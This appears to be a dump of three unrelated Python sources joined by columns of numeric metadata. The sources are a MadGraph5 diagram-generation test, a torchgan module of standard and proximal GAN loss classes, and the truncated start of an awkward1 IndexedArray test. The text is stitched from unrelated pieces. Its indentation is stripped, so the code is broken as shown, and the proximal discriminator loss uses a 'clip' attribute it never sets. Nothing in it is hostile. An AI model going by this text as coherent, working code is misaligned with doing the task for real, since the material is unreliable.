([-2, 2, 1, -1, 21], 4),
([-2, 2, 2, -2, 21], 4),
([-2, 21, 1, -1, -2], 2),
([-2, 21, 2, -2, -2], 4),
([21, 1, 1, 1, -1], 4),
([21, 1, 1, 2, -2], 2),
([21, -1, 1, -1, -1], 4),
([21, -1, -1, 2, -2], 2),
([21, 2, 1, -1, 2], 2),
([21, 2, 2, 2, -2], 4),
([21, -2, 1, -1, -2], 2),
([21, -2, 2, -2, -2], 4)])
for nfs in range(2, max_fs + 1):
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList([copy.copy(leg) for leg in [my_multi_leg] * (2 + nfs)])
my_multi_leglist[0].set('state', False)
my_multi_leglist[1].set('state', False)
my_process_definition = base_objects.ProcessDefinition({'legs':my_multi_leglist,
'model':self.mymodel,
'required_s_channels': [[22]]})
my_multiprocess = diagram_generation.MultiProcess(\
{'process_definitions':\
base_objects.ProcessDefinitionList([my_process_definition])})
if nfs <= 3:
self.assertEqual(len(my_multiprocess.get('amplitudes')),
goal_number_processes[nfs - 2])
# Calculate diagrams for all processes
#amplitudes = my_multiprocess.get('amplitudes')
valid_procs = [([leg.get('id') for leg in \
amplitude.get('process').get('legs')],
len(amplitude.get('diagrams'))) \
for amplitude in my_multiprocess.get('amplitudes')]
if nfs <= 3:
self.assertEqual(valid_procs, goal_valid_procs[nfs - 2])
def test_wrong_multiparticle(self):
"""Check that an exception is raised for empty multipart amplitudes"""
max_fs = 2 # 3
p = [-1, -2]
j = [ 1, 2]
my_multi_init = base_objects.MultiLeg({'ids': p, 'state': False});
my_multi_final = base_objects.MultiLeg({'ids': j, 'state': True});
goal_number_processes = [0, 0]
for nfs in range(2, max_fs + 1):
# Define the multiprocess
my_multi_leglist = base_objects.MultiLegList(
[copy.copy(leg) for leg in [my_multi_init] * 2] + \
[copy.copy(leg) for leg in [my_multi_final] * nfs]
)
my_process_definition = base_objects.ProcessDefinition({'legs':my_multi_leglist,
'model':self.mymodel}
)
my_multiprocess = diagram_generation.MultiProcess(\
{'process_definitions':\
base_objects.ProcessDefinitionList([my_process_definition])})
if nfs <= 3:
self.assertRaises(MadGraph5Error,
my_multiprocess.get, 'amplitudes')
def test_crossing_uux_gg(self):
"""Test the number of diagram generated for uu~>gg (s, t and u channels)
"""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':-1,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
myamplitude = diagram_generation.Amplitude(myproc)
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':1,
'state':False}))
myleglist.append(base_objects.Leg({'id':21,
'state':False}))
myleglist.append(base_objects.Leg({'id':1,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
crossproc = base_objects.Process({'legs':myleglist,
'model':self.mymodel})
crossamp = diagram_generation.MultiProcess.cross_amplitude(myamplitude,
crossproc,
[3,4,2,1],
[2,4,1,3])
crossed_numbers = [[[3, 1, 1], [2, 4, 1]],
[[3, 2, 2], [1, 4, 2]],
[[3, 4, 3], [1, 2, 3]]]
crossed_states = [[[True, False, False], [False, True, False]],
[[True, False, False], [False, True, False]],
[[True, True, True], [False, False, True]]]
for idiag, diagram in enumerate(crossamp.get('diagrams')):
self.assertEqual([[l.get('number') for l in v.get('legs')] \
for v in diagram.get('vertices')],
crossed_numbers[idiag])
self.assertEqual([[l.get('state') for l in v.get('legs')] \
for v in diagram.get('vertices')],
crossed_states[idiag])
#===============================================================================
# TestDiagramTag
#===============================================================================
class TestDiagramTag(unittest.TestCase):
"""Test class for the DiagramTag class"""
def setUp(self):
self.base_model = import_ufo.import_model('sm')
def test_diagram_tag_gg_ggg(self):
"""Test the diagram tag for gg > ggg"""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':21,
'state':False}))
myleglist.append(base_objects.Leg({'id':21,
'state':False}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myproc = base_objects.Process({'legs':myleglist,
'model':self.base_model})
myamplitude = diagram_generation.Amplitude(myproc)
tags = []
permutations = []
diagram_classes = []
for idiag, diagram in enumerate(myamplitude.get('diagrams')):
tag = diagram_generation.DiagramTag(diagram)
try:
ind = tags.index(tag)
except:
diagram_classes.append([idiag + 1])
permutations.append([tag.get_external_numbers()])
tags.append(tag)
else:
diagram_classes[ind].append(idiag + 1)
permutations[ind].append(tag.get_external_numbers())
permutations = [[diagram_generation.DiagramTag.reorder_permutation(p, perms[0])\
for p in perms] for perms in permutations]
goal_classes = [[1, 2, 3],
[4],
[5, 6, 9, 10, 13, 14],
[7, 11, 15],
[8, 12, 16],
[17, 18, 19],
[20, 21, 22],
[23, 24, 25]]
goal_perms = [[[0, 1, 2, 3, 4], [0, 1, 2, 4, 3], [0, 1, 4, 2, 3]],
[[0, 1, 2, 3, 4]],
[[0, 1, 2, 3, 4], [0, 1, 2, 4, 3], [0, 1, 3, 2, 4],
[0, 1, 4, 2, 3], [0, 1, 3, 4, 2], [0, 1, 4, 3, 2]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4], [0, 1, 3, 4, 2]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4], [0, 1, 3, 4, 2]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4], [0, 1, 3, 4, 2]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4], [0, 1, 3, 4, 2]],
[[0, 1, 2, 3, 4], [0, 1, 2, 4, 3], [0, 1, 4, 2, 3]]]
for i in range(len(diagram_classes)):
self.assertEqual(diagram_classes[i], goal_classes[i])
self.assertEqual(permutations[i], goal_perms[i])
def test_diagram_tag_uu_uug(self):
"""Test diagram tag for uu>uug"""
myleglist = base_objects.LegList()
myleglist.append(base_objects.Leg({'id':2,
'state':False}))
myleglist.append(base_objects.Leg({'id':2,
'state':False}))
myleglist.append(base_objects.Leg({'id':2,
'state':True}))
myleglist.append(base_objects.Leg({'id':2,
'state':True}))
myleglist.append(base_objects.Leg({'id':21,
'state':True}))
myproc = base_objects.Process({'legs':myleglist,
'model':self.base_model})
myamplitude = diagram_generation.Amplitude(myproc)
tags = []
permutations = []
diagram_classes = []
for idiag, diagram in enumerate(myamplitude.get('diagrams')):
tag = diagram_generation.DiagramTag(diagram)
try:
ind = tags.index(tag)
except:
diagram_classes.append([idiag + 1])
permutations.append([tag.get_external_numbers()])
tags.append(tag)
else:
diagram_classes[ind].append(idiag + 1)
permutations[ind].append(tag.get_external_numbers())
permutations = [[diagram_generation.DiagramTag.reorder_permutation(p, perms[0])\
for p in perms] for perms in permutations]
goal_classes = [[1, 8], [2, 9], [3, 10], [4, 11], [5, 12], [6, 13],
[7, 14], [15, 18], [16, 19], [17, 20], [21, 24],
[22, 25], [23, 26]]
goal_perms = [[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]],
[[0, 1, 2, 3, 4], [0, 1, 3, 2, 4]]]
for i in range(len(diagram_classes)):
self.assertEqual(diagram_classes[i], goal_classes[i])
self.assertEqual(permutations[i], goal_perms[i])
def test_reorder_permutation(self):
"""Test the reorder_permutation routine"""
perm1 = [2,3,4,5,1]
perm2 = [3,5,2,1,4]
goal = [3,2,4,1,0]
self.assertEqual(diagram_generation.DiagramTag.reorder_permutation(\
perm1, perm2), goal)
def test_diagram_tag_to_diagram_uux_nglue(self):
"""Test diagrams from DiagramTags for u u~ > n g
"""
# Test 2, 3, 4 and 5 gluons in the final state
for ngluon in range (2, 4):
# Create the amplitude
myleglist = base_objects.LegList([\
base_objects.Leg({'id':2, 'state':False}),
base_objects.Leg({'id':-2, 'state':False})])
myleglist.extend([base_objects.Leg({'id':21,
'state':True})] * ngluon)
myproc = base_objects.Process({'legs':myleglist,
'orders':{'QCD':ngluon, 'QED': 0},
'model':self.base_model})
myamplitude = diagram_generation.Amplitude(myproc)
diagrams = myamplitude.get('diagrams')
diagram_tags = [diagram_generation.DiagramTag(d) \
for d in diagrams]
#print myamplitude.get('process').nice_string()
for i,(d,dtag) in enumerate(zip(diagrams, diagram_tags)):
#print '%3r: ' % (i+1),d.nice_string()
#print 'new: ',dtag.diagram_from_tag(self.base_model).nice_string()
# Check that the resulting diagram is recreated in the same way
# from the diagram tag (by checking the diagram tag)
self.assertEqual(dtag,
diagram_generation.DiagramTag(\
dtag.diagram_from_tag(self.base_model)))
| 41.621412
| 112
| 0.41004
| 14,127
| 160,950
| 4.538756
| 0.042472
| 0.096929
| 0.057269
| 0.040674
| 0.826775
| 0.800543
| 0.773
| 0.750682
| 0.720832
| 0.690435
| 0
| 0.046447
| 0.450488
| 160,950
| 3,866
| 113
| 41.632178
| 0.67852
| 0.05616
| 0
| 0.709159
| 0
| 0
| 0.087661
| 0.00097
| 0
| 0
| 0
| 0
| 0.042037
| 1
| 0.018797
| false
| 0
| 0.004443
| 0
| 0.035202
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73cdcce53f7ffcece92d9bf0cf9baf8ba6165629
| 25,813
|
py
|
Python
|
torchgan/losses/loss.py
|
proximal-dg/proximal_dg
|
000e925c7daab099b2c3735f99e65e6b2a00a799
|
[
"MIT"
] | 13
|
2021-05-12T05:37:20.000Z
|
2022-03-30T17:05:47.000Z
|
torchgan/losses/loss.py
|
proximal-dg/proximal_dg
|
000e925c7daab099b2c3735f99e65e6b2a00a799
|
[
"MIT"
] | 3
|
2021-10-20T04:51:36.000Z
|
2022-02-25T13:37:32.000Z
|
torchgan/losses/loss.py
|
proximal-dg/proximal_dg
|
000e925c7daab099b2c3735f99e65e6b2a00a799
|
[
"MIT"
] | 1
|
2021-12-28T17:03:08.000Z
|
2021-12-28T17:03:08.000Z
|
import torch
import torch.nn as nn
import copy
from torch import autograd
from math import log
__all__ = ["GeneratorLoss", "DiscriminatorLoss","ProximalDiscriminatorLoss","ProximalGeneratorLoss"]
class GeneratorLoss(nn.Module):
r"""Base class for all generator losses.
.. note:: All Losses meant to be minimized for optimizing the Generator must subclass this.
Args:
reduction (str, optional): Specifies the reduction to apply to the output.
If ``none`` no reduction will be applied. If ``mean`` the outputs are averaged over batch size.
If ``sum`` the elements of the output are summed.
override_train_ops (function, optional): Function to be used in place of the default ``train_ops``
"""
def __init__(self, reduction="mean", override_train_ops=None,eval_only=False):
super(GeneratorLoss, self).__init__()
self.reduction = reduction
self.override_train_ops = override_train_ops
self.arg_map = {}
self.eval_only = eval_only
def set_arg_map(self, value):
r"""Updates the ``arg_map`` for passing a different value to the ``train_ops``.
Args:
value (dict): A mapping of the ``argument name`` in the method signature and the
variable name in the ``Trainer`` it corresponds to.
.. note::
If the ``train_ops`` signature is
``train_ops(self, gen, disc, optimizer_generator, device, batch_size, labels=None)``
then we need to map ``gen`` to ``generator`` and ``disc`` to ``discriminator``.
In this case we make the following function call
``loss.set_arg_map({"gen": "generator", "disc": "discriminator"})``.
"""
self.arg_map.update(value)
def train_ops(
self,
generator,
discriminator,
optimizer_generator,
device,
batch_size,
labels=None,
):
r"""Defines the standard ``train_ops`` used by most losses. Losses which have a different
training procedure can either ``subclass`` it **(recommended approach)** or make use of
``override_train_ops`` argument.
The ``standard optimization algorithm`` for the ``generator`` defined in this train_ops
is as follows:
1. :math:`fake = generator(noise)`
2. :math:`value = discriminator(fake)`
3. :math:`loss = loss\_function(value)`
4. Backpropagate by computing :math:`\nabla loss`
5. Run a step of the optimizer for generator
Args:
generator (torchgan.models.Generator): The model to be optimized.
discriminator (torchgan.models.Discriminator): The discriminator which judges the
performance of the generator.
optimizer_generator (torch.optim.Optimizer): Optimizer which updates the ``parameters``
of the ``generator``.
device (torch.device): Device on which the ``generator`` and ``discriminator`` is present.
batch_size (int): Batch Size of the data infered from the ``DataLoader`` by the ``Trainer``.
labels (torch.Tensor, optional): Labels for the data.
Returns:
Scalar value of the loss.
"""
if self.override_train_ops is not None:
return self.override_train_ops(
generator,
discriminator,
optimizer_generator,
device,
batch_size,
labels,
)
else:
if labels is None and generator.label_type == "required":
raise Exception("GAN model requires labels for training")
noise = torch.randn(batch_size, generator.encoding_dims, device=device)
optimizer_generator.zero_grad()
if generator.label_type == "generated":
label_gen = torch.randint(
0, generator.num_classes, (batch_size,), device=device
)
if generator.label_type == "none":
fake = generator(noise)
elif generator.label_type == "required":
fake = generator(noise, labels)
elif generator.label_type == "generated":
fake = generator(noise, label_gen)
if discriminator.label_type == "none":
dgz = discriminator(fake)
else:
if generator.label_type == "generated":
dgz = discriminator(fake, label_gen)
else:
dgz = discriminator(fake, labels)
loss = self.forward(dgz)
self.loss = loss
# print("G Loss : ",loss.item())
if(not self.eval_only):
loss.backward()
optimizer_generator.step()
# NOTE(avik-pal): This will error if reduction is is 'none'
return loss.item()
class DiscriminatorLoss(nn.Module):
r"""Base class for all discriminator losses.
.. note:: All Losses meant to be minimized for optimizing the Discriminator must subclass this.
Args:
reduction (str, optional): Specifies the reduction to apply to the output.
If ``none`` no reduction will be applied. If ``mean`` the outputs are averaged over batch size.
If ``sum`` the elements of the output are summed.
override_train_ops (function, optional): Function to be used in place of the default ``train_ops``
"""
def __init__(self, reduction="mean", override_train_ops=None,eval_only=False):
super(DiscriminatorLoss, self).__init__()
self.reduction = reduction
self.override_train_ops = override_train_ops
self.arg_map = {}
self.eval_only = eval_only
def set_arg_map(self, value):
r"""Updates the ``arg_map`` for passing a different value to the ``train_ops``.
Args:
value (dict): A mapping of the ``argument name`` in the method signature and the
variable name in the ``Trainer`` it corresponds to.
.. note::
If the ``train_ops`` signature is
``train_ops(self, gen, disc, optimizer_discriminator, device, batch_size, labels=None)``
then we need to map ``gen`` to ``generator`` and ``disc`` to ``discriminator``.
In this case we make the following function call
``loss.set_arg_map({"gen": "generator", "disc": "discriminator"})``.
"""
self.arg_map.update(value)
def train_ops(
self,
generator,
discriminator,
optimizer_discriminator,
real_inputs,
device,
labels=None,
):
r"""Defines the standard ``train_ops`` used by most losses. Losses which have a different
training procedure can either ``subclass`` it **(recommended approach)** or make use of
``override_train_ops`` argument.
The ``standard optimization algorithm`` for the ``discriminator`` defined in this train_ops
is as follows:
1. :math:`fake = generator(noise)`
2. :math:`value_1 = discriminator(fake)`
3. :math:`value_2 = discriminator(real)`
4. :math:`loss = loss\_function(value_1, value_2)`
5. Backpropagate by computing :math:`\nabla loss`
6. Run a step of the optimizer for discriminator
Args:
generator (torchgan.models.Generator): The model to be optimized.
discriminator (torchgan.models.Discriminator): The discriminator which judges the
performance of the generator.
optimizer_discriminator (torch.optim.Optimizer): Optimizer which updates the ``parameters``
of the ``discriminator``.
real_inputs (torch.Tensor): The real data to be fed to the ``discriminator``.
device (torch.device): Device on which the ``generator`` and ``discriminator`` is present.
batch_size (int): Batch Size of the data infered from the ``DataLoader`` by the ``Trainer``.
labels (torch.Tensor, optional): Labels for the data.
Returns:
Scalar value of the loss.
"""
if self.override_train_ops is not None:
return self.override_train_ops(
self,
generator,
discriminator,
optimizer_discriminator,
real_inputs,
device,
labels,
)
else:
if labels is None and (
generator.label_type == "required"
or discriminator.label_type == "required"
):
raise Exception("GAN model requires labels for training")
batch_size = real_inputs.size(0)
noise = torch.randn(batch_size, generator.encoding_dims, device=device)
if generator.label_type == "generated":
label_gen = torch.randint(
0, generator.num_classes, (batch_size,), device=device
)
optimizer_discriminator.zero_grad()
if discriminator.label_type == "none":
dx = discriminator(real_inputs)
elif discriminator.label_type == "required":
dx = discriminator(real_inputs, labels)
else:
dx = discriminator(real_inputs, label_gen)
if generator.label_type == "none":
fake = generator(noise)
elif generator.label_type == "required":
fake = generator(noise, labels)
else:
fake = generator(noise, label_gen)
if discriminator.label_type == "none":
dgz = discriminator(fake.detach())
else:
if generator.label_type == "generated":
dgz = discriminator(fake.detach(), label_gen)
else:
dgz = discriminator(fake.detach(), labels)
loss = self.forward(dx, dgz)
self.loss = loss
if(not self.eval_only):
loss.backward()
optimizer_discriminator.step()
# NOTE(avik-pal): This will error if reduction is is 'none'
return loss.item()
class ProximalDiscriminatorLoss(DiscriminatorLoss):
r"""Base class for all proximal discriminator losses.
.. note:: All Losses meant to be minimized for optimizing the Discriminator must subclass this.
Args:
reduction (str, optional): Specifies the reduction to apply to the output.
If ``none`` no reduction will be applied. If ``mean`` the outputs are averaged over batch size.
If ``sum`` the elements of the output are summed.
override_train_ops (function, optional): Function to be used in place of the default ``train_ops``
"""
def __init__(self, reduction="mean",override_train_ops=None,eval_only=False,lamda_prox=0.10,steps=10):
super(ProximalDiscriminatorLoss, self).__init__(reduction,override_train_ops,eval_only)
self.reduction = reduction
self.override_train_ops = override_train_ops
self.arg_map = {}
self.eval_only = eval_only
self.lamda_prox = lamda_prox
self.steps = steps
def set_arg_map(self, value):
r"""Updates the ``arg_map`` for passing a different value to the ``train_ops``.
Args:
value (dict): A mapping of the ``argument name`` in the method signature and the
variable name in the ``Trainer`` it corresponds to.
.. note::
If the ``train_ops`` signature is
``train_ops(self, gen, disc, optimizer_discriminator, device, batch_size, labels=None)``
then we need to map ``gen`` to ``generator`` and ``disc`` to ``discriminator``.
In this case we make the following function call
``loss.set_arg_map({"gen": "generator", "disc": "discriminator"})``.
"""
self.arg_map.update(value)
def train_ops(
self,
generator,
discriminator,
optimizer_discriminator,
real_inputs,
device,
labels=None,
):
r"""Defines the standard ``train_ops`` used by most losses. Losses which have a different
training procedure can either ``subclass`` it **(recommended approach)** or make use of
``override_train_ops`` argument.
The ``standard optimization algorithm`` for the ``discriminator`` defined in this train_ops
is as follows:
1. :math:`fake = generator(noise)`
2. :math:`value_1 = discriminator(fake)`
3. :math:`value_2 = discriminator(real)`
4. :math:`loss = loss\_function(value_1, value_2)`
5. Backpropagate by computing :math:`\nabla loss`
6. Run a step of the optimizer for discriminator
Args:
generator (torchgan.models.Generator): The model to be optimized.
discriminator (torchgan.models.Discriminator): The discriminator which judges the
performance of the generator.
optimizer_discriminator (torch.optim.Optimizer): Optimizer which updates the ``parameters``
of the ``discriminator``.
real_inputs (torch.Tensor): The real data to be fed to the ``discriminator``.
device (torch.device): Device on which the ``generator`` and ``discriminator`` is present.
batch_size (int): Batch Size of the data infered from the ``DataLoader`` by the ``Trainer``.
labels (torch.Tensor, optional): Labels for the data.
Returns:
Scalar value of the loss.
"""
if self.override_train_ops is not None:
return self.override_train_ops(
self,
generator,
discriminator,
optimizer_discriminator,
real_inputs,
device,
labels,
)
else:
real_inputs.requires_grad = True
if labels is None and (
generator.label_type == "required"
or discriminator.label_type == "required"
):
raise Exception("GAN model requires labels for training")
proximal_discriminator = type(discriminator)(discriminator.in_size,discriminator.in_channels,discriminator.step_channels,discriminator.batchnorm,discriminator.nonlinearity,discriminator.last_nonlinearity,discriminator.label_type).to(device)
proximal_discriminator.load_state_dict(discriminator.state_dict())
# for step in range(self.steps):
batch_size = real_inputs.size(0)
for step in range(self.steps):
if self.clip is not None:
for p in discriminator.parameters():
p.data.clamp_(self.clip[0], self.clip[1])
noise = torch.randn(batch_size, generator.encoding_dims, device=device)
if generator.label_type == "generated":
label_gen = torch.randint(
0, generator.num_classes, (batch_size,), device=device
)
optimizer_discriminator.zero_grad()
if discriminator.label_type == "none":
dx = discriminator(real_inputs)
dx_prox = proximal_discriminator(real_inputs)
elif discriminator.label_type == "required":
dx = discriminator(real_inputs, labels)
dx_prox = proximal_discriminator(real_inputs, labels)
else:
dx = discriminator(real_inputs, label_gen)
dx_prox = proximal_discriminator(real_inputs, label_gen)
if generator.label_type == "none":
fake = generator(noise)
elif generator.label_type == "required":
fake = generator(noise, labels)
else:
fake = generator(noise, label_gen)
if discriminator.label_type == "none":
dgz = discriminator(fake.detach())
else:
if generator.label_type == "generated":
dgz = discriminator(fake.detach(), label_gen)
else:
dgz = discriminator(fake.detach(), labels)
grad_dx = autograd.grad(torch.unbind(dx), real_inputs, create_graph=False,retain_graph=True)[0]
grad_dx_prox = autograd.grad(torch.unbind(dx_prox), real_inputs, create_graph=False,retain_graph=True)[0]
penalty = torch.mean(torch.square(torch.norm(grad_dx_prox-grad_dx,dim=(2,3))))
loss = self.forward(dx, dgz) + self.lamda_prox*penalty
self.loss = loss
loss.backward()
optimizer_discriminator.step()
return loss.item()
class ProximalGeneratorLoss(GeneratorLoss):
r"""Base class for all proximal generator losses.
.. note:: All Losses meant to be minimized for optimizing the Generator must subclass this.
Args:
reduction (str, optional): Specifies the reduction to apply to the output.
If ``none`` no reduction will be applied. If ``mean`` the outputs are averaged over batch size.
If ``sum`` the elements of the output are summed.
override_train_ops (function, optional): Function to be used in place of the default ``train_ops``
"""
def __init__(self, reduction="mean", override_train_ops=None,eval_only=False,lamda_prox=0.10,steps=10,proximal_discriminator_loss=None):
super(ProximalGeneratorLoss, self).__init__(reduction,override_train_ops,eval_only)
self.reduction = reduction
self.override_train_ops = override_train_ops
self.arg_map = {}
self.eval_only = eval_only
self.lamda_prox = lamda_prox
self.steps = steps
self.proximal_discriminator_loss = proximal_discriminator_loss
def set_arg_map(self, value):
r"""Updates the ``arg_map`` for passing a different value to the ``train_ops``.
Args:
value (dict): A mapping of the ``argument name`` in the method signature and the
variable name in the ``Trainer`` it corresponds to.
.. note::
If the ``train_ops`` signature is
``train_ops(self, gen, disc, optimizer_generator, device, batch_size, labels=None)``
then we need to map ``gen`` to ``generator`` and ``disc`` to ``discriminator``.
In this case we make the following function call
``loss.set_arg_map({"gen": "generator", "disc": "discriminator"})``.
"""
self.arg_map.update(value)
def train_ops(
self,
real_inputs,
generator,
discriminator,
optimizer_discriminator,
optimizer_generator,
device,
batch_size,
labels=None,
):
r"""Defines the standard ``train_ops`` used by most losses. Losses which have a different
training procedure can either ``subclass`` it **(recommended approach)** or make use of
``override_train_ops`` argument.
The ``standard optimization algorithm`` for the ``generator`` defined in this train_ops
is as follows:
1. :math:`fake = generator(noise)`
2. :math:`value = discriminator(fake)`
3. :math:`loss = loss\_function(value)`
4. Backpropagate by computing :math:`\nabla loss`
5. Run a step of the optimizer for generator
Args:
generator (torchgan.models.Generator): The model to be optimized.
discriminator (torchgan.models.Discriminator): The discriminator which judges the
performance of the generator.
optimizer_generator (torch.optim.Optimizer): Optimizer which updates the ``parameters``
of the ``generator``.
device (torch.device): Device on which the ``generator`` and ``discriminator`` is present.
batch_size (int): Batch Size of the data infered from the ``DataLoader`` by the ``Trainer``.
labels (torch.Tensor, optional): Labels for the data.
Returns:
Scalar value of the loss.
"""
if self.override_train_ops is not None:
return self.override_train_ops(
generator,
discriminator,
optimizer_generator,
device,
batch_size,
labels,
)
else:
real_inputs.requires_grad = True
if labels is None and (
generator.label_type == "required"
or discriminator.label_type == "required"
):
raise Exception("GAN model requires labels for training")
prox_discriminator = type(discriminator)(discriminator.in_size,discriminator.in_channels,discriminator.step_channels,discriminator.batchnorm,discriminator.nonlinearity,discriminator.last_nonlinearity,discriminator.label_type).to(device)
prox_discriminator.load_state_dict(discriminator.state_dict())
for p,q in zip(discriminator.parameters(),prox_discriminator.parameters()):
q.requires_grad = p.requires_grad
for step in range(self.steps):
optimizer_discriminator.zero_grad()
if hasattr(self.proximal_discriminator_loss,"clip"):
for p in discriminator.parameters():
p.data.clamp_(self.proximal_discriminator_loss.clip[0], self.proximal_discriminator_loss.clip[1])
batch_size = real_inputs.size(0)
noise = torch.randn(batch_size, generator.encoding_dims, device=device)
if generator.label_type == "generated":
label_gen = torch.randint(
0, generator.num_classes, (batch_size,), device=device
)
if discriminator.label_type == "none":
dx = discriminator(real_inputs)
dx_prox = prox_discriminator(real_inputs)
elif discriminator.label_type == "required":
dx = discriminator(real_inputs, labels)
dx_prox = prox_discriminator(real_inputs, labels)
else:
dx = discriminator(real_inputs, label_gen)
dx_prox = prox_discriminator(real_inputs, label_gen)
if generator.label_type == "none":
fake = generator(noise)
elif generator.label_type == "required":
fake = generator(noise, labels)
else:
fake = generator(noise, label_gen)
if discriminator.label_type == "none":
dgz = discriminator(fake.detach())
else:
if generator.label_type == "generated":
dgz = discriminator(fake.detach(), label_gen)
else:
dgz = discriminator(fake.detach(), labels)
grad_dx = autograd.grad(torch.unbind(dx), real_inputs, create_graph=False,retain_graph=True)[0]
grad_dx_prox = autograd.grad(torch.unbind(dx_prox), real_inputs, create_graph=False,retain_graph=True)[0]
penalty = torch.mean(torch.square(torch.norm(grad_dx - grad_dx_prox,dim=(2,3))))
loss = self.proximal_discriminator_loss.forward(dx, dgz) + self.lamda_prox*penalty
loss.backward()
optimizer_discriminator.step()
if labels is None and generator.label_type == "required":
raise Exception("GAN model requires labels for training")
noise = torch.randn(batch_size, generator.encoding_dims, device=device)
optimizer_generator.zero_grad()
if generator.label_type == "generated":
label_gen = torch.randint(
0, generator.num_classes, (batch_size,), device=device
)
if generator.label_type == "none":
fake = generator(noise)
elif generator.label_type == "required":
fake = generator(noise, labels)
elif generator.label_type == "generated":
fake = generator(noise, label_gen)
if discriminator.label_type == "none":
dgz = discriminator(fake)
else:
if generator.label_type == "generated":
dgz = discriminator(fake, label_gen)
else:
dgz = discriminator(fake, labels)
loss = self.forward(dgz)
self.loss = loss
if(not self.eval_only):
loss.backward()
optimizer_generator.step()
discriminator.load_state_dict(prox_discriminator.state_dict())
# NOTE(avik-pal): This will error if reduction is is 'none'
return loss.item()
| 44.124786
| 252
| 0.577345
| 2,761
| 25,813
| 5.243028
| 0.077508
| 0.032053
| 0.033158
| 0.020724
| 0.946601
| 0.930437
| 0.91669
| 0.908953
| 0.901907
| 0.895966
| 0
| 0.003489
| 0.333785
| 25,813
| 584
| 253
| 44.200342
| 0.838286
| 0.362221
| 0
| 0.817629
| 0
| 0
| 0.037642
| 0.003017
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036474
| false
| 0
| 0.015198
| 0
| 0.088146
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb6a0f3a61dc30bca420a6f1eb6b1fc07fe6df12
| 4,570
|
py
|
Python
|
tests/test_0082-indexedarray-setidentities.py
|
nikoladze/awkward-1.0
|
7e1001b6ee59f1cba96cf57d144e7f2719f07e69
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_0082-indexedarray-setidentities.py
|
nikoladze/awkward-1.0
|
7e1001b6ee59f1cba96cf57d144e7f2719f07e69
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_0082-indexedarray-setidentities.py
|
nikoladze/awkward-1.0
|
7e1001b6ee59f1cba96cf57d144e7f2719f07e69
|
[
"BSD-3-Clause"
] | null | null | null |
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/master/LICENSE
from __future__ import absolute_import
import sys
import pytest
import numpy
import awkward1
def test_error():
content = awkward1.layout.NumpyArray(numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]))
index = awkward1.layout.Index64(numpy.array([0, 2, 4, 6, 8, 10, 12, 14], dtype=numpy.int64))
indexedarray = awkward1.layout.IndexedArray64(index, content)
with pytest.raises(ValueError) as err:
indexedarray.setidentities()
assert str(err.value) == "in IndexedArray64 attempting to get 10, max(index) > len(content)"
def test_passthrough_32():
content = awkward1.layout.NumpyArray(numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]))
index = awkward1.layout.Index32(numpy.array([0, 2, 4, 6, 8, 9, 7, 5], dtype=numpy.int32))
indexedarray = awkward1.layout.IndexedArray32(index, content)
assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 9.9, 7.7, 5.5]
indexedarray.setidentities()
assert numpy.asarray(indexedarray.identities).tolist() == [[0], [1], [2], [3], [4], [5], [6], [7]]
assert numpy.asarray(indexedarray.content.identities).tolist() == [[0], [-1], [1], [-1], [2], [7], [3], [6], [4], [5]]
assert isinstance(indexedarray.content.identities, awkward1.layout.Identities32)
def test_passthrough_U32():
content = awkward1.layout.NumpyArray(numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]))
index = awkward1.layout.IndexU32(numpy.array([0, 2, 4, 6, 8, 9, 7, 5], dtype=numpy.uint32))
indexedarray = awkward1.layout.IndexedArrayU32(index, content)
assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 9.9, 7.7, 5.5]
indexedarray.setidentities()
